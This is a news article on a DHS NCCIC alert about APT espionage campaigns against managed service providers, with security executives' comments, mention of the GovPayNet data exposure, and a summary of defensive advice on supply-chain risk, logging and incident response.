The recent Department of Homeland Security alert describing ongoing cyberattacks on global managed service providers highlights the need for the U.S. government to take a lead role in protecting internet infrastructure, according to some industry cybersecurity experts.
On Oct. 3, DHS’ National Cybersecurity and Communications Integration Center (NCCIC) issued an alert reporting that it is “aware of ongoing APT [Advanced Persistent Threat] actor activity attempting to infiltrate the networks of global managed service providers (MSPs).”
In fact, since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. These cyberattacks have targeted several U.S. critical infrastructure sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing, according to NCCIC.
MSPs provide remote management of customer information technology and end-user systems, allowing enterprises and government agencies to scale and support their network environments at a lower cost than financing these resources internally. However, the network connectivity if compromised between the MSP and customers’ networks could be used as a pathway into multiple customers’ networks.
“Using an MSP significantly increases an organization’s virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cyber criminals and nation-state actors,” the NCCIC alert states. By using compromised MSP credentials, a cybercriminal can move bidirectionally between an MSP and its customers’ shared networks.
The recent DHS alerts about cyberattacks on managed services and cloud providers highlight the difficult task that enterprises and municipal governments face as their IT and cyber operations teams work to protect critical assets and information, said Pravin Kothari, CEO of CipherCloud. This cloud security company develops secure gateways that encrypt sensitive information before it is stored in cloud infrastructures.
“Enterprise and government cannot face off against well-funded nation-state attackers or large-scale organized crime. It is a ridiculous proposition to believe otherwise,” he said. To that end, “the U.S. government needs to step in and defend our internet infrastructure so that normal commerce and communications can continue unhindered,” Kothari said.
“We must do this within the rule of law, put all of the evidence out there in the view of the global community, and enlist the support of our allies to ensure we are successful,” he added.
APT Techniques
APT attackers use a range of “living off the land” techniques to maintain anonymity while conducting their attacks. These techniques include using legitimate credentials, trusted off-the-shelf applications, and pre-installed system tools present in MSP customer networks. When APT actors use system tools and common cloud services, it can also be difficult for network defenders to detect data exfiltration according to the NCCIC.
“The sophistication of these attacks means that companies will have to continuously review their digital assets and that of their third-party vendors and business partners to ensure that all vulnerabilities are detected and patched,” said Matan Or-El, CEO of security company Panorays.
“Recent evidence is showing that the supply chain is becoming an increasingly popular attack surface, even in the government sector as illustrated by the recent incidents related to GovPayNow and Pay2Gov,” he said.
In September, security analysts revealed that GovPayNet, which manages online payments for U.S. government agencies via the domain GovPayNow.com, exposed at least six years of customer data. The exposed information includes names, addresses, phone numbers, and the last four digits of credit cards submitted through online payment systems. It is estimated that 14 million records were exposed.
MSP clients should understand the supply chain risk associated with their MSP, NCCIC advised. “MSP clients should also refer to cloud security guidance from the National Institute of Standards and Technology to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection.”
Additionally, enterprises and government agencies should configure system logs to detect incidents and to identify the type and scope of malicious activity. Properly configured logs enable rapid containment and appropriate response, NCCIC states.
Moreover, an organization’s ability to rapidly respond to and recover from an incident begins with the development of an incident response capability. An organization’s response capability should focus on being prepared to handle the most common attack vectors such as spearphishing, malicious web content, and credential theft, according to NCCIC.